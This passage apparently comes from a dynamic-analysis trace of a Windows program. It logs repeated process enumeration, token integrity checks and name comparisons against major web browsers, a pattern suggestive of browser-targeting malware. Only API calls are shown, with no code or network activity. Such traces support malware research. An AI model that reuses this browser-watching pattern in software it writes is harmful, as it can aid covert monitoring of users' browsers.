lpString2="explorer.exe") returned 1 [0594.676] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0594.676] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0594.676] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0594.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0594.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x668 [0594.677] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0594.677] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0594.677] GetLastError () returned 0x7a [0594.677] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fd48, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd48, ReturnLength=0x20f7ac) returned 1 [0594.677] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0594.677] CloseHandle (hObject=0x4e0) returned 1 [0594.677] CloseHandle (hObject=0x668) returned 1 [0594.678] GetLengthSid (pSid=0x40fd50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0594.678] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0594.678] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0594.678] GetLastError () returned 0x7a [0594.678] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41aec8, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41aec8, ReturnLength=0x20f7d8) returned 1 [0594.678] GetSidSubAuthorityCount (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41aed1 [0594.678] GetSidSubAuthority (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41aed8 [0594.678] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0594.678] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0594.679] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0594.679] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0594.679] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0594.679] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0594.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0594.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0594.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0594.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x668 [0594.680] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0594.680] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0594.680] GetLastError () returned 0x7a [0594.680] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fd48, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd48, ReturnLength=0x20f7ac) returned 1 [0594.680] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0594.680] CloseHandle (hObject=0x4e0) returned 1 [0594.680] CloseHandle (hObject=0x668) returned 1 [0594.680] GetLengthSid (pSid=0x40fd50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0594.681] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0594.681] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0594.681] GetLastError () returned 0x7a [0594.681] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41aec8, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41aec8, ReturnLength=0x20f7d8) returned 1 [0594.681] GetSidSubAuthorityCount (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41aed1 [0594.681] GetSidSubAuthority (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41aed8 [0594.681] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0594.681] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0594.681] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0594.681] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0594.682] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0594.682] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0594.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0594.682] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0594.683] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0596.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x99d8) returned 0xc0000004 [0596.692] VirtualAlloc (lpAddress=0x0, dwSize=0xa9d8, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0596.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa9d8, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0596.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0596.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0596.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0596.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0596.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0596.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0596.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0596.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0596.696] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0596.697] GetLastError () returned 0x7a [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fe08, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe08, ReturnLength=0x20f7ac) returned 1 [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0596.697] CloseHandle (hObject=0x4e0) returned 1 [0596.697] CloseHandle (hObject=0x298) returned 1 [0596.697] GetLengthSid (pSid=0x40fe10*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0596.697] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0596.697] GetLastError () returned 0x7a [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41ae08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41ae08, ReturnLength=0x20f7d8) returned 1 [0596.697] GetSidSubAuthorityCount (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41ae11 [0596.697] GetSidSubAuthority (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41ae18 [0596.697] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0596.697] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0596.697] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0596.697] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0596.697] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0596.697] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0596.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0596.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0596.697] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0596.697] GetLastError () returned 0x7a [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fe08, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe08, ReturnLength=0x20f7ac) returned 1 [0596.697] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0596.697] CloseHandle (hObject=0x4e0) returned 1 [0596.698] CloseHandle (hObject=0x298) returned 1 [0596.698] GetLengthSid (pSid=0x40fe10*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0596.698] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0596.698] GetLastError () returned 0x7a [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41ae08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41ae08, ReturnLength=0x20f7d8) returned 1 [0596.698] GetSidSubAuthorityCount (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41ae11 [0596.698] GetSidSubAuthority (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41ae18 [0596.698] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0596.698] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0596.698] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0596.698] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0596.698] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0596.698] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0596.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0596.698] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0596.698] GetLastError () returned 0x7a [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fe08, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe08, ReturnLength=0x20f7ac) returned 1 [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0596.698] CloseHandle (hObject=0x4e0) returned 1 [0596.698] CloseHandle (hObject=0x298) returned 1 [0596.698] GetLengthSid (pSid=0x40fe10*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0596.698] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0596.698] GetLastError () returned 0x7a [0596.698] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41ae08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41ae08, ReturnLength=0x20f7d8) returned 1 [0596.698] GetSidSubAuthorityCount (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41ae11 [0596.698] GetSidSubAuthority (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41ae18 [0596.698] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0596.698] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0596.698] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0596.698] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0596.698] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0596.698] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0596.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0596.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0596.699] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0596.699] GetLastError () returned 0x7a [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fe08, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe08, ReturnLength=0x20f7ac) returned 1 [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0596.699] CloseHandle (hObject=0x4e0) returned 1 [0596.699] CloseHandle (hObject=0x298) returned 1 [0596.699] GetLengthSid (pSid=0x40fe10*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0596.699] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0596.699] GetLastError () returned 0x7a [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41ae08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41ae08, ReturnLength=0x20f7d8) returned 1 [0596.699] GetSidSubAuthorityCount (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41ae11 [0596.699] GetSidSubAuthority (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41ae18 [0596.699] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0596.699] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0596.699] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0596.699] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0596.699] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0596.699] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0596.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0596.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0596.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0596.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0596.699] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0596.699] GetLastError () returned 0x7a [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fe08, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe08, ReturnLength=0x20f7ac) returned 1 [0596.699] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0596.699] CloseHandle (hObject=0x4e0) returned 1 [0596.699] CloseHandle (hObject=0x298) returned 1 [0596.700] GetLengthSid (pSid=0x40fe10*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0596.700] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0596.700] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0596.700] GetLastError () returned 0x7a [0596.700] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41ae08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41ae08, ReturnLength=0x20f7d8) returned 1 [0596.700] GetSidSubAuthorityCount (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41ae11 [0596.700] GetSidSubAuthority (pSid=0x41ae10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41ae18 [0596.700] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0596.700] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0596.700] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0596.700] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0596.700] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0596.700] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0596.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0596.700] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0596.700] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0598.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9988) returned 0xc0000004 [0598.704] VirtualAlloc (lpAddress=0x0, dwSize=0xa988, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0598.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa988, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0598.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0598.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0598.706] 